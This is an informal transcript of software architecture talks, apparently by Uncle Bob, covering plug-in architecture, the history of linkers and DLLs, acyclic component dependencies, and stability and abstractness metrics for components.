look in. Nobody can look in. You just keep it in there. You keep them isolated. You don't let the frameworks touch them. Frameworks. If you're a framework author, the thing you hope for most is that someone will inherit from your base classes. Because once they inherit from your base classes, they have married you without any commitment on your part. You are the sultan. They are the harem. They marry you. You don't marry them. They throw their inheritance relations at you and they are bound to you. It's very difficult to break an inheritance relationship. If you derive from a framework, you are bound to that framework. I don't want you doing that. I don't want you treating a framework as if it were the sultan and you were the harem. I want you to keep the framework at arm's length. Out here somewhere. You can use it. It's all right. You can date it. Don't marry it. Put some little interface in between. Make it a plug-in to your application. Will this hamper you slightly? Oh, it will create some minor inconveniences because, frankly, it's convenient to marry something. But there are costs that you don't want to experience. Keep the frameworks at arm's length. Who is doing dependency injection? Look at that. Everybody is doing dependency injection. It's cool, isn't it? Dependency injection. You get to kind of specify, oh, these objects just come out of nowhere, don't know where they come from. And then who's got an XML file that describes how the dependency injection actually works? Who's got one of those? A few of you that you've completely lost control of. Who's experienced, you know, the, well, I built the system and it doesn't work. Because the dependency injection configuration is all screwed up. Who has put elements in their source code that denote certain classes are dependency injected? Auto wire statements or things like that. And in.NET these would be the square bracket annotations or attributes, whatever they're called. In Java they're little at sign annotations or attributes, often called auto wire or something like that. I don't want any of that in the business model. I don't want any of that stuff up here. I don't want any source code above the line to know what dependency injection framework we're using. I don't mind dependency injection. I just think it ought to be injected below the line. What exists below the line? Well, one of the modules that exists down there is called main. Main. You remember main? Main is that thing that you write at the beginning in the main program. Main is a plug-in. Main contains the strategy implementations, the factory implementations, the dependency injection specifications, all that concrete horrible stuff that you can then pass through a plug-in connection to the application as abstract entities. Main is a plug-in. The database is a plug-in. The GUI is a plug-in. The frameworks are all kept at arm's length across the plug-in boundary. I want you to think of your application this way. As a group of use cases that describe the intent of the application and then a group of plug-ins that give those use cases access to the outside world. A good architecture is an architecture that allows you to use decisions late. Decisions about the UI. Decisions about the database. Decisions about frameworks. You can make them late because you can implement all the use cases without them. A good architect maximizes the use cases. The use cases are all set up. The use cases are set up in the database. A good architect maximizes the number of decisions not made. The amount of decisions that can be deferred until later because later is always better when you're making decisions. You have more information later. I won't do the rant on TDD because I only have two minutes. Are there any questions? Yeah? So I'll repeat the question. When I was talking about databases, at one point it sounded like I was talking about Datomic. Datomic is a database engine that works the way I talked about. You can add things to it. You cannot delete. You cannot update. There are many such database engines out there. Datomic is just one of them. I suggest that if you're interested in that kind of stuff, you can look up Datomic. You can look up the work of Greg Young who's been working on this stuff for a long time and start to investigate this idea of transaction-based data rather than state-based data. Anybody else? The lights are in my eyes. All right, I think you can go then. Thank you.
|
So we've heard the message about Clean Code. And we've been practicing TDD for some time now. But what about architecture and design? Don't we have to worry about that? Or is it enough that we keep our functions small, and write lots of tests? In this talk, Uncle Bob talks about the next level up. What is the goal of architecture and design? What makes a design clean? How can we evolve our systems towards clean architectures and designs in an incremental Agile way.
|
10.5446/51498 (DOI)
|
Ready? Sound on? Cool. Alright. So, do you see that red dot? Yeah. Yeah. Yeah. Yeah. Yeah. Cool. Alright. So, do you see that red dot? Yeah. Yeah. Why is it red? It's dangerous. I like that answer. Watch out. Take me to Cuba. Yeah. I've had the security people restrict me from going into airports, you know, because I'm carrying lasers with me. They have, you know, a sign on them that says dangerous. But why is that red? I have a green laser. Hey, you know, you got to have lasers. Alright. I carry three of them with me. One of them is red. I always keep them in my backpack with the batteries out of them, or turned around, actually. Yeah. So, this is my red laser. You can get a red laser for $12. There it is. Red laser. Nice. And I got a green laser. This one's a nice one. A pretty bright one, too. Not bright enough to do anything interesting, but bright. There's a little adjustment in here. You can cut a component out and put a different resistor in here, and then you can get almost a quarter watt out of it. The battery drains pretty fast, but you can pop a balloon with it. I mean, that's cool to do. I'd just balloon. But this is my favorite laser. And I like this one because, well, can you see that? I mean, little tiny violet dot. Do you see that up there? Let's see if I can show it to you here. Whoa, that's nice and bright on my thing here. That's nice and bright. But over there, you can hardly see it. Can you see it on this thing? No. Can you see it here? No, not too much. No, can't see it there much. But I found this once. It's just a marker, right? And the little laser doesn't do too much to the marker, but the lid. And look, it's yellow. It's not blue. Can you see that little orange thing there? Watch this. I got to aim it real carefully. Whoa! It's orange. What kind of laser is this? This is a laser of some other color. My glasses are the kind that turn dark in the sunlight. I don't know if you can tell, but now they're all dark. And I can't see any of you. This is an ultraviolet laser. They don't bill it as such. You can buy them on Amazon, $17. They say it's a violet laser. They lie. It's much cooler than a violet laser. It's an ultraviolet laser. Everybody has to have an ultraviolet laser. It's completely useless as a laser pointer. But you can draw nice little pretty pictures on your glasses with it. Wow, I can write my name. All right, whatever. Look at the code on the screen. Anybody recognize that code? I can't see it because my glasses are all dark. Anybody recognize that code? That's PDP-8 code. That's what code looked like in 1970. That's the kind of code I was writing when I was a slightly older teenager. And then on into my 20s as well. And this statement right there. Anybody know what that means? That's the memory address at which this program would be loaded. We used to write the address of our program into our program. This program would be loaded at address 200. And we'd put the data at address 300. How about that? It made perfect sense. Of course you would know where your program is going to get loaded. Who else is going to decide that for you? You, the programmer. You had control over memory. Now, this works fine. I'll show you a sequence of pictures here. Let's see. Yeah, that's a nice one. No, that's not the one I wanted. That's because nowadays when you open up documents, it opens up every document that's been opened by that application. Don't save the dog on. That's the one I wanted right there. Imagine you're a programmer who's writing this kind of code. And you've got a program like this one. My program lives here. It starts at address 200. And there's a subroutine library that somebody else has written. Now, by the way, subroutine libraries were not real common. You usually wrote your own subroutines back in those days. But after a while, a few guys would write some useful subroutines and you'd think, you know, I should have those in my program too. And you'd think, well, I'll just compile them in with my code. And that's what we used to do. We'd just take the source code and jam it together. What was the problem with that? We were talking about the 1970s here. Those programs were contained on paper tape. Paper tape was read at 50 characters per second if you were lucky. And so increasing the size of your source code lengthened the size of your compile by minutes. So after a while, these subroutine libraries got too long to continue to add to your source code. So what we did is we would compile the subroutine library and we would load it at location 1200. Then what we could do is we could have a binary file, which got loaded at 1200, and we could have our program at 200 and we'd have a little file that had all the symbols in it. So the symbols would tell us which subroutine was loaded where. So we knew that the get subroutine was at 1205 and the put subroutine was at 1210 and so on. And our symbols would get compiled in with the program. The subroutines would be loaded separately and everything worked fine. What's the problem with this? When's the last time you saw a program that stayed small? They grow. And after a while, well, let's see. I got another picture here. Yeah, that's that one. Oh, yeah. A program that got too big. It overwrites the subroutines. This doesn't work. When your program overwrites the subroutines, your program still thinks that the subroutines are there. So when it calls location 1205, it actually jumps into some arbitrary part of your code. You didn't know this happened, of course, until you finally debug it and realized, oh, my program's gotten too big. What's the solution to this? Your programmers, you can come up with a solution to this. Jump around the subroutine library. Right? You put a jump right there to jump over here. Of course, the subroutine library gets bigger, too. And so after a while, let's see if I've got that picture right. How about that one? Yeah, that's the one. After a while, you get that problem. We actually faced these problems. We actually had to deal with this stuff. And do you know how we solved it? We came up with relocatable code. We said, you know what? This idea of putting the absolute address in the program is killing us. What we'd really like to do is compile our programs without telling them where they're going to be loaded. And then we will tell the loader where to load them. So there's a problem with that. Because that means that your binary files cannot really be binary. They have to have codes in them to tell you that certain addresses are not actually addresses. They are offsets. And the loader has to find every address that's marked as an offset and add the start address to it. But that works. We had relocatable loaders. We made these relocatable binaries and loaders. But now you've got another problem. Because how do you know where the subroutines are? If the subroutines are going to be moving all over the place, how do you know where the subroutines are? So now you have to add more information to the binary file. And this binary file that you thought was just the binary of your program is now becoming this very bizarre file. It's got all kinds of gunk in it. Now you have to put the names of the subroutine library into the binary file of the subroutines. And you have to show what address they will get loaded at. And the relocatable loader has to remember where it put those addresses. And then in the program, you have to have another thing in there that says, hey, I need to know where this program is going to be loaded. And the loader has to link the subroutine library to the program. Computers were slow in those days. Disk drives were very slow. And there wasn't a lot of disk memory. You were lucky if you had megabytes of disk. And the seek arms took a long time. And the rotational latency was high. So link times took a long time, especially as we got more and more libraries, more and bigger programs. Link time could take an hour. Anybody have a link that took an hour? Anybody here working in the 80s? Oh, no, you got one now. You must be a C++ programmer. That says so right on his shirt. Oslo C++ user group. Long link times. Even in the 70s, we had that problem with much smaller programs. So the solution to that was to separate the link phase from the load phase. We would link as a second compile step. And that would produce a final relocatable file that had all the linkages resolved, and then we could load it at runtime. And that was relatively fast enough. And for years and years and years, we lived with this two-step process. Compile down to binary files, then link all the binary files into an executable, and then you could load the executable. And that solved the problem until the 90s. In the 90s, something happened. It was called Moore's Law. What's Moore's Law? The speed of processors will double every 18 months. Now, apply that from about 1970, when the speeds of our processors were half a million instructions per second. And keep that going forward until the 1990s. Well, that's 20 years. How many 18 cycles is that? Well, that's 18-month cycles is that. That's about 15 cycles. So we have a 2 to the 15th increase in speed. Think about that. 2 to the 15th increase in speed, what is that? That's an increase of about 32,000. That's about right, too. Because we went from about a half a megahertz to 2.8 gigahertz. Well, maybe 1 gigahertz by the late 90s. By that time, disks were going faster, too. And we'd spun them up a lot faster in the road. The heads weren't moving as far, and we were getting a lot more bits around the rim, too. Now, we could get what? Hundreds of megabytes on a disk. Oh. And somebody made the bright thought. Somebody had the bright thought that, well, we don't have to do the link separately anymore. We could do the link at the same time we load. Anybody remember ActiveX? Anybody remember Olay? What does DLL stand for? Dynamically linked library, which means it's linked at load time. The link step got moved back into the loader. And we have the situation we have today. Virtually ever. Who's done that program in here? Look at that. A lot of people. Java programmers, raise your hands. Not so many. How come? How come it's all.NET? Oh, maybe it's because it's a.NET-y kind of conference, huh? So, in.NET, you got DLLs, dynamically linked libraries. In Java, you got JAR files. But they're still dynamically linked libraries. Same idea, same purpose. In C++, if you're doing the Microsoft thing, you still got DLLs. If you're doing a Unix thing, you've got shared libraries. They are still dynamically linked libraries. Our mode of operation nowadays is to dynamically link our libraries. That's how we got here. How many DLLs do you have? Guys with the solutions, video studio solutions. How many projects? 60. That's not bad. Who's got more than 60? Oh, look at that. Who's got more than 200? And do you know why you separate your code into different DLLs? Let me ask that question differently. When you deploy your application, do you gather up all the DLLs and just ship the WAD? If you do, then why are you dynamically linking them? Statically link them. Why would you bother with dynamic linking if you're just going to take all those DLLs, gather them up into one gigantic WAD, and throw the big WAD in a directory, and say, well, there's my system. Why dynamically link if you're not going to dynamically deploy? Why did we come up with dynamically linked libraries? We came up with dynamically linked libraries so that we could dynamically deploy our applications. Why? Well, we're going to get to network speed. Hang on a minute, because network speed has a huge impact on this whole thing. Mid-90s, I've got a client. He's got a 250 megabyte executable. In the mid-90s, that was a big program. Now it's nothing. But then, 250 megabytes was a big deal. You could not fit it on a CD. This was a CAD system. He shipped it to companies like Ford. Ford would use it to design gears and levers, stuff like that. He statically linked it. He would deploy the executable to his clients by burning it on several CDs. If he changed one line of code, he had to recompile, re-link, re-burn all the CDs, and deploy all those CDs to all his clients. You can imagine that cost him a fair bit of money. I went there in the mid-90s, and I encountered them at a time when they were trying to chop up their executable into this new idea, DLLs, because they realized that if they had dynamically linked libraries, then they could change a line of code, and ideally, you'd only have to ship that DLL. You could email it. Back in those days, that was a big deal. You couldn't email 250 megabytes in those days. Nowadays, you can, as long as the guy you're talking to has got a reasonable email server. But back in those days, emailing in 250 megabytes was impossible. So they could email the 100 kilobytes of a DLL. And so that was very, very desirable for them. They worked on it for months and months and months, chopping their application up into little tiny bits, turning them all into a bunch of DLLs, and that's when they realized their critical mistake. The critical mistake was that chopping your system up into a bunch of arbitrary DLLs doesn't do you a damn bit of good if they all depend on each other. If they all depend on each other, then you can... Was anybody just in Scott Meyer's talk? Here? The last talk he just gave an hour ago? He was talking about the problem of keyholes. The problem of keyholes is that we arbitrarily constrain someone, for no good reason. Just arbitrarily constrain them. So, for example, have you ever seen a text box on a GUI that was just too short, and you had to type a bunch of stuff in it, and it wouldn't let you resize the window, it wouldn't let you scroll in any way, you just had to kind of type blind, or maybe the text would scroll, but you wouldn't be able to see the beginning of it? He was mentioning the keyhole problem, and I note that something just happened here. Apparently, I'm not allowed to not touch my computer for more than five minutes. I must apparently touch my computer, otherwise I will be punished. What was I talking about? Oh, yeah, DLLs. So, this guy, he put all these DLLs together, he forgot that DLLs depend upon each other. His goal was to be able to touch a line of code and just ship that DLL that was affected, but he found that all the pound includes, C++ guy knows what I'm talking about, all the pound includes, formed a horrible network, and he had to recompile and redeploy everything anyway. They went out of business. The purpose of my talk today, now that I'm getting around to it, is to talk about components, the problem of component design. And the first thing we're going to do is define a component. What's a component? Component's a DLL. When I talk about the word component, what I mean is DLL, very particular kind of DLL, a dynamically deployable DLL, DLL, oh, I almost said DNA, a dynamically deployable DLL. Why would we want to dynamically deploy? Well, because we'd like to be able to change one line of code, just ship the one DLL that changed and ignore all the others. What's DLL hell? A term invented, I believe, by Microsoft to describe their own situation, and was to be completely cured by.NET. Anybody remember that line?.NET cures DLL hell. Ha ha ha ha ha. No, it doesn't cure DLL hell. DLL hell is the problem that we've got all these little components with different version numbers, and nobody knows which one should go together, so we invent these module maintenance tools like Maven. What are you guys using.NET? What's the tool that lets you keep all of your DLLs in line so that you know the download version one of that one and version three of that one? Do you have a tool for that? What? Nougat. Like the soft, chewy center? Never mind, I'm not going there. The graph you see on the screen is a graph of x squared. This is just the x squared graph, but it's also something else. It's the number of dependencies in a system, the theoretical maximum number of dependencies given a certain number of modules. And you can see that the number of modules increases linearly and the number of dependencies increases with the square. The couplings of the theoretical maximum number of couplings, which I show here, is proportional to the square of the number of modules. Now, of course, we would never create a system that has every possible dependency in it. Or would we? Look at this curve. This curve is the productivity of a team in comparison to the number of modules. By the way, this is completely arbitrary. I just generated a one over x squared curve here. This is not me collecting actual data. This is just me recollecting my experience with development teams. They go slower and slower and slower over time. Who's had this happen to them? You start out going really fast. You can conquer the world. A year later, you're slogging through some kind of horrible wetlands. And you don't know what the heck has gone wrong, but estimates that used to be on the order of one week are now three months long. And by the way, you blow all those estimates anyway and introduce more bugs than you fix. That's the kind of problem that we have as we proceed along a development path. And one of the reasons for that is this accumulation of dependencies. Why? Well, that's the theoretical maximum dependency between modules. This is the theoretical minimum. If you're going to have an interconnected set of modules, there has to be some dependencies. And the minimum set of dependencies is a tree structure. Oh, you can do some better with dynamic linking if you want to. But for the most part, you're going to have a small number of dependencies. How many do we have? One, two, three, four, five, six. Six out of seven modules. Whereas here you've got, well, I think that's half of 49. It can't be half of 49 because that would be half of dependency. Maybe it's just plain 49. I don't know what it is. It's a large number. It's some relative of n squared. Maybe it's 1 half n squared plus 1 half n. Something like that. It's a very large number of dependencies. We don't want this. We do want that. We strive very hard to get here. But then some schmuck does that. Visual Studio doesn't allow this. Inside a solution. Inside a solution, the DLLs cannot have cycles between their graphs. That's good. Don't want cycles. Between separate solutions, there's no guarantee. If you have multiple solutions, or if you're linking with things that come out of different solutions, you can still have cycles in the graph. If you get cycles in the graph, it looks like it adds only one extra dependency. But actually it adds more. Because six now depends upon two. Because one depends on two. Dependencies are transitive. Six also depends upon four and five. Six depends upon three and seven. In fact, six depends on all of them. So the number of dependencies multiplies dramatically as soon as you have a cycle. This is the n squared graph again. This is also a graph of C++ compile time. As you add modules. The compile time and the link time, but even if you're not doing static linking, just the compile time grows with the square of the number of modules if you have a fully connected network of modules. What that means is that your pound includes, or your import statements, or your using statements can be traced in a cycle. And if you have that, then you're going to wind up with this big increase in compile time. C++ in particular would do this. Java and.NET don't. Their compile time is based on a different metric. They don't go reading source files the way Java, or the way C++ does. Java and.NET read binary files to get their declarations. C++ reads source files to get its declarations. And so if you had a cycle in C++, you got punished by a big compile time. And a massive one would go up with the square. So you'd add a couple of modules, your compile time would double. And that made us do something about it. Who knows who Ward Cunningham is? Well, few of you do. Good. And the rest of you. He's the guy who invented wikis. Ward Cunningham invented wikis. He's the guy who helped Kent Beck invent pair programming, test driven development, most of the agile stuff. Get to know who Ward Cunningham is. He's a very interesting fellow, a small talk programmer from long ago. And I asked Ward once, why did small talk die Ward? And he said, small talk died because it was so easy to make a mess. You C++ programmers, I was a C++ programmer at the time, you C++ programmers are lucky. Your language punishes you if you make a mess. Small talk didn't punish you. Well, neither does Java, neither does C sharp. They don't punish you anymore. It's very easy to make a very large mess and get a very tangled structure and not know you're doing it. Fortunately, Visual Studio keeps some of the cycles out of your graph. We would like that level of productivity, which is an n log n, rather than this level of productivity, that's an n squared. And one of the ways to help with that is to manage the dependencies between our components. Now, something happened to us in the late 90s and into the 2000s. Network speeds started increasing dramatically. Nowadays, it's not hard at all to download a gigabyte in a couple of seconds, to upload a gigabyte in 10 seconds. That's pretty easy nowadays. Back in the early days, it was much harder. So back in the early days, we thought shipping individual DLLs was going to be a benefit. Nowadays, though, we just kind of gather them all together and ship the one big WOD. Why? Well, because network speed is fast enough, we can do it. We can treat our batch of DLLs just like it was statically linked. But there's another issue. How many of you work in teams? Well, look at that. Everybody works in teams. So you come in at 8 in the morning. You got a task to perform. You work all day to get all your stuff working. It all works by the end of the day. You check it in, you go home. Come back the next day, all your stuff is broken. Why? Somebody stayed later than you and changed something that you depend upon. And so you work all day long to fix whatever the problem was, and you go home and you come back the next day and your stuff is broken again. How many times can you go around that loop? Lots of times. This is a problem of large teams. Large teams will start to step on each other. And, of course, we've invented tools to help us. We've got source code control systems, and we've got all kinds of good stuff to help us with this. But we still can step all over each other unless we manage our projects well. So how can we manage our projects well? There is a principle. A principle called the acyclic dependencies principle. The acyclic dependencies principle says, if you have a set of components, you would like them to be arranged without any cycles in the dependency graph. Now, for a whole bunch of reasons, we've already talked about one of them, which is compile time. We've talked about another, which is just the dependency load. Here's another. Alarm would like to release its version of alarm. The team that's working on alarm would like to make release 1.0. They've got nobody that depends on them, or nobody that they depend upon, so they're completely free to make any release they want. So they release their version of 1.0, alarm 1.0. They start working on alarm 1.1. But now alarm 1.0 has been released, which means that elevator and conveyor can make their release. And once elevator and conveyor have made their releases, they can start to work on 1.1, but now transport can make its release. You can see what's happening here, right? The version numbers bubble up from the bottom. 1.0 gets created here, then there, then there, here, here, and finally there. The version numbers bubble up from the bottom. If you look at it closely, you'll realize that the version numbers follow the exact same path as the build, the compile. Because the dependencies are running in that direction. And now some poor smuck does this. Who's this? Well, that was me. I did that. I had an alarm subsystem I was working on, and I needed to put a message on the display in the control panel. There happened to be a class up here that had a function called display, and I thought, oh, I should just call it. So I called it. This was not in a language that restricted me from cycles. And so it compiled and everything was fine. It all worked okay. And then the next day I had a group of angry developers come to my cubicle with clubs and tell me, what the hell did you do? I said, well, I just called, I called this control panel display class. It had a display function in it. I needed to put this message on the screen, but I can't do that. Why can't we do that? First of all, what order should we build those modules in? You'd like to build them bottom up. But now there's no bottom. So there's no correct build order. If you have cycles in the component graph, there is no correct build order for the modules in that system. And therefore the execution of that system is undefined. What does undefined mean? What's the definition of undefined? Works in the lab. Anything undefined will work until you actually deploy it somewhere, then it will fail. You can get systems to fail rather badly by having these cycles. This is pretty common in Java. If you have a system of Java that has cycles in it, you can build it, although there's no correct build order. Then you run your test and the test will fail. Then you build it again. That will choose a different build order, and maybe the test will pass. I know of companies that put their build in a loop until the test pass. But the problem is worse than that. Because Conveyor would like to make their release. They want to release 1.1. Now for them to release 1.1, they have to test with Alarm 1.1. But Alarm 1.1 is waiting for Control Panel 1.1, which is waiting for Transport 1.1, which is waiting for Conveyor 1.1, which is the one we're trying to release. So there's no way to make the release without checking all of that source code out into one place, integrating. Anybody remember integration, the joys of integration? Integrate the whole system, and then make it work. And while you're doing that, you're going to be stepping all over each other. So if this cycle will bring back the problem of coming in at 8 in the morning and find that everything doesn't work. But it's worse than that. Because in order to test Conveyor, I need Alarm, which needs Control Panel, which needs Revenue, which needs the database. The database takes 45 minutes to load, and then it crashes. I can't run my tests. And the guys in Conveyor are saying, why the heck do I need the database? Well, you need the database because of this strange dependency structure. Anybody ever look at the number of DLLs that get loaded and scratch your head and say, how come I need those? Anybody in a C++ world ever have a link line and wonder what's all this stuff on the link line? How come I need all that stuff? You got cycles in the dependency graph. It's bringing in all kinds of gunk. So the first principle of components is, no cycles in the components. What if you want to do this? What if you really want to call some function from down here, that lives up there? How are you going to do it? Well, you could pull out another component. That's one way to do it. Here I took that class out of the Control Panel. I put it in the Display component. Then the Alarm component could talk to the Display component. The Control Panel can talk to the Display component. I can keep the cycles out. That's a common enough technique. Remember, these are all DLLs. So the number of DLLs in your system will start to grow as people want to add cycles to the dependency graph. Maybe. Although there is another way to resolve the cycle. You can use dependency inversion. I could put an interface, a display interface in the Alarm sub-system and have the Control Panel implemented. That turns the dependency around and changes the cycle into a straight tree. What's OO? What is object orientation? Why do we like it? How come all of our languages are object-oriented languages? We've been doing this for 30 years. We ought to know. Models to real world. Thank you. I planted him here so he could say that. Then I could rip him to shreds. No, that's absurd. The whole idea that OO is a better way to model the real world is plain nonsense. It's something that some guy concocted a long time ago to convince his manager to spend 12 grand on a C++ compiler because he couldn't figure out any other way to get his manager to do it. 12 grand? Early C++ compilers cost a lot of money. 12 grand? I'm not spending that for a compiler. Well, it'll help me model the real world. Oh, okay then. This whole notion of modeling the real world is just downright silly. What in the world is OO other than a bunch of functions using a bunch of data structures? Encapsulated, okay, fine, encapsulated. But a bunch of functions using a bunch of data structures. They're different from non-OO. The answer to that is, well, it's not easy to describe how that's different. Oh, okay, we kind of put the data structures and the functions together, but we always used to do that. Old C programmers used to do that all the time. Data structures and programs always went together. There's a famous book called Algorithms Plus Data Structures Equals Programs. Data structures and algorithms working together. So nothing really fancy about OO there. There is one thing that OO gave us that we did not have before because it wasn't safe, and that's polymorphism. Very, very convenient polymorphism. We used to have it in C, device independence in any operating system is an example of polymorphism. If you can write a program and you don't need to know what device that program is going to use, it's clearly a polymorphic interface. But that's dangerous in most languages, or it was back in the day because you had to fiddle with pointers to functions, and that was always dangerous. What OO gave us was very, very convenient polymorphism. Polymorphism without thinking about it, Java in particular, all the methods are polymorphic. There's no choice. C sharp, you have a choice. You can use that funny virtual keyword. C++ programmers, you've got a choice. You better use that damn virtual keyword, especially on your destructors. But most of us, we don't even pay attention anymore. All our functions are polymorphic. We don't even think about it. Why? Because when a function is polymorphic, something amazing happens. The flow of control goes down towards the derivative, but the source code dependency goes back towards the base. We can take a source code dependency and turn it around without changing the runtime dependency. How do you get DLLs? How do you get components? You isolate them, but you have to maintain the runtime dependency. Visual Studio people, are you using Resharper? Who is Resharper? Look at that, everybody. Does Visual Studio know about Resharper? No. Does Visual Studio call Resharper? Yes. The flow of control goes from Visual Studio into Resharper. There are function calls in Visual Studio that make their way into Resharper, but there is no source code dependency that moves from Visual Studio into Resharper, because they've inverted the dependencies. You can create DLLs that your application will call, but your application doesn't know they exist, and you do that by inverting dependencies. Turn them around. This is one nice way to do that. Now, the alarm system, the control panel, is a plug-in to the alarm system. The alarm system doesn't know the control panel exists. The control panel is a plug-in, and the alarm system would accept any kind of plug-in. There are a lot of different things that could implement this display function here, so we could have lots of different things that we alarmed. What would you rather depend upon? A component that was stable or a component that was unstable? Trick questions. Everybody knows you want to depend on something that's stable. But now let me define stability. Is my laser stable? It's not changing, but is it stable? Stability is not a boolean. Stability is a continuous variable, and it is defined as the amount of work required to make a change. If it takes a lot of work to make a change, it's stable. If it takes very little work to make a change, it's unstable. That is unstable, because it doesn't take much work to make a change at state. This, well, I won't say that that's stable, because it wouldn't take much work to upset it. And this whole stage doesn't feel very stable to me, so I may have to be careful about the way I move. Let me ask the question again. What would you rather depend upon? Something easy to change or something hard to change? Modify the source code. What would you rather depend upon? A module whose source code was hard to change or a module whose source code was easy to change? Same answer. You want to depend upon the thing that's hard to change. And the reason behind that is very simple. Do you mind depending on string? No. Why don't you mind depending on string? Because if those guys ever change string, they'd be held to pay. They would suffer more than you. That's the equation that we're talking about here. You are happy to depend upon something if it will hurt the authors of that thing more to change it than it hurts you. That's the equation. You are happy to depend upon things as long as they're not likely to change or at least the bastards are going to pay if they change. So, all right. We don't want to depend on things that are easy to change. Think about that very carefully. I don't want to depend on something easy to change. Do we design parts of our system so that they will be easy to change? Yes. What parts of our system do we most want to be easy to change? The GUI. GUIs are volatile. They change for no good reason at all. People will change GUIs just because they feel like it. There'll be some committee that'll be formed to say, you know, our system looks old. What the hell does that mean? Our system looks old. We need to give it a face lift. The marketing people have decided we've got to have a whole new look and feel. Not going to change any behavior. Just a look and feel to the GUI. The GUI has to be easy to change. The modules that hold that source code have to be easy to change. And that means that none of your other modules should depend on the GUI. No source code dependencies should land on the GUI. Your components should not have dependencies that land on the GUI. GUI components have to depend upon the application. Application components cannot depend on the GUI. Otherwise, you wind up with systems that where the GUI is hard to change. How many of you test your systems? Automated tests. Through the GUI. Ooh. Got a couple of people. You write test code through the GUI, you are depending on something that's supposed to be easy to change. You will make it hard to change if you test your system through the GUI. I have a client who has 15,000 tests all go through the GUI. Same client, by the way. Same one that went out of business. 15,000 tests through the GUI. He has so many tests he didn't know what they were anymore. He just knew they all had to pass. If somebody touched the GUI, a thousand of those tests would break, and he couldn't find the time to fix them. So he came up with a real simple rule. What do you think that rule was? Nobody touches the GUI. They made the GUI hard to change. The other thing, of course, that could happen there is that you could lose your tests. You spend a man year putting together a nice automated test suite that goes through the GUI, and then somebody decides, oh, we need a facelift on our site. Throw out the old GUI, put a brand new GUI, and all those tests are gone. And you get to rewrite them again, but you've got other systems you've got to test. Don't test through the GUI. Don't do anything through the GUI. All dependencies point away from the GUI. What other things do we want to be easy to change? The database. We want the database to be easy to change. We want to be able to make changes to the database without it rippling through the whole application. All dependencies should point away from the database. Put the database in a component with all dependencies pointing outwards. Put the GUI into a component with all dependencies pointing outwards. I don't want to depend on anything that is unstable. How can we measure instability? See this guy up here? That component up there? Is he stable or unstable? He's got lots of incoming dependencies. No outgoing dependencies. He's hard to change. If I make a change to him, it impacts all those guys. This component here is responsible to those guys. This component here is independent. It doesn't depend on anybody. It's responsible and independent. It's an adult. Stable. Adult. This guy. He depends on lots of other components. Nobody depends upon him. He's irresponsible and dependent. He's a teenager. He's unstable. These are the two extreme kinds of components. At the two sides of the component spectrum, you've got the adults that are highly stable and you've got the teenagers who are highly unstable. The unstable ones are easy to change. That's where we want to put all the volatile code. The stable ones are hard to change. We can measure that stability by creating a metric. That metric is a metric that I call I. I is equal to the fan out, the number of outgoing dependencies, divided by the fan in plus the fan out. If you think about that for very long, you'll realize that I is a metric that goes from zero to one. Zero being stable, one being unstable. Zero being an adult, one being a teenager. It's all about the dependencies. And now we can rephrase the principle to say this. Every dependency in a component graph should point at something more stable than it is. Or if you use the metric, these arrows should point in the direction of decreasing I, decreasing instability, increasing stability. And you can do the math on just the fan in's and fan out's and verify that that's correct. Why was the cycle a bad idea? Something stable depended on something unstable. But that leaves us with a problem. And the problem is this. What's that guy? Stable or unstable? He's really stable. He's sitting down here at the bottom of the graph. Everything over here depends on him. He's very hard to change. If I touch that component, all these other components will be affected by it. If for no other reason, then the release number changes. That means that stuff down here at the bottom of the graph is very difficult to work with. But there's an escape to that. Back to polymorphism. How can you make something easy to extend even though it's hard to modify? You make it abstract. Abstract classes can be extended trivially without having to modify them. You can add new features to a system if those new features live inside of derivatives of base classes. The final principle is this. We would like abstractness to increase as we go down these arrows. Stuff up here, concrete. Unstable and concrete. Stuff down here, abstract and stable. Abstractness becomes more and more prevalent as we go down this tree. In fact, we could say that abstractness is a number, which is the number of abstract classes divided by the total number of classes in a component. If you did that, you get this number A, which goes from zero to one. Zero being concrete, one being entirely abstract, composed of nothing but interfaces. Then we can do this very interesting thing. We can say that for any particular component, A plus I should equal one. Either it's abstract, where A is a one, and stable, where I is a zero, or it is instable, where I is a one, and concrete, where A is a zero. A plus I equals one. The magic formula of components. A plus I equals one. Now, you've got the adults up here, which are abstract and everybody depends upon them, so they're stable. You've got the teenagers down here. So you've got everybody that's got no incoming dependencies, but they're very concrete. What do you got here? This is the line A plus I equals one. This is where we'd like all our components to sit if they can't sit at one of those two endpoints. Why? Well, what's up here? Highly abstract, nobody depends upon it. An interface that nobody implements. Useless, this is the zone of uselessness. We do not want our components going that way. What's down here? Very concrete, everybody depends upon it. Database schemas. Concrete, everybody depends upon them. Fun to change. We don't want things down here. This is the zone of pain. We'd like our components to be as far from those two points as possible. Ideally, if we could get them here and here, that would be best. But it turns out that components are persnickety that way. So at least we would like them to be sitting along this line. Or close to the line. Which leaves us with one last metric. D. How far away is the component from the line? Well, D could be the absolute value of A plus I minus 1. You can do the math on this. It's not very difficult. D is a metric that goes from 0 to 1. 0 means right on the line, 1 means at one of the two bad endpoints. If you want to know which endpoint, you can take the absolute value signs off. But I don't care. You can measure D by looking at the fan in and the fan out of a component, measuring its abstractness. Doing the math, it's not a very difficult math to do. And find out whether your component sits nicely on that line. If it does, then it is abstract as it is depended upon. If it doesn't, that means either it's very abstract and not depended on, or very concrete and heavily depended upon, both of which are bad ideas. There are lots of tools that will automatically calculate these metrics for you. If you've ever used N-depend, that will calculate the metrics for you. If you've ever used any of the other static analysis tools, they can generate all these metrics, I, D, all of them for you, so that you can look at your components and see if they fit. And then think about what should be easy to change. Things that are easy to change should be in teenagers. Things that are hard to change should be in adults that are abstract. Concrete teenagers hold the stuff that's easy to change. Abstract adults hold the stuff that's hard to change. Any questions? We started with PDPA assembly code. And got here. Any questions? No? Good? Oh, damn. It's alright. It's okay. What happens when you have a... Yeah? And then you just step above that to the... Oh, two versions. Yeah, two versions, same component. You kill the programmers. Yeah. Don't have multiple versions of the same component in your system, please. That's DOL health. Anybody else? Where do you place the... Very, very good question. String class sits right there. It's in the worst possible place, but nobody ever changes it, so we don't care. This is all about the stuff we are actively developing, the stuff that is being changed. So we pay very close attention to the stuff that's in our libraries that are changing. The stuff that we get from other libraries that's not changing, or the stuff that's in our old libraries that's not changing, we're not going to pay attention to that here. A lot of that stuff may live here, and that's okay. None of it's going to live here. Well, some of it might. Everybody pulled out any dead code? Abstract classes that nobody implements? Yeah, okay. So maybe you'll see some stuff there. But string, vector, a lot of the libraries live down here, and we don't care because they're not volatile. Think of another axis coming out from this graph, right? Towards you. That's the axis of volatility. This is a slice where volatility is close to one. The stuff where volatility is zero, we don't care about. Anybody else? 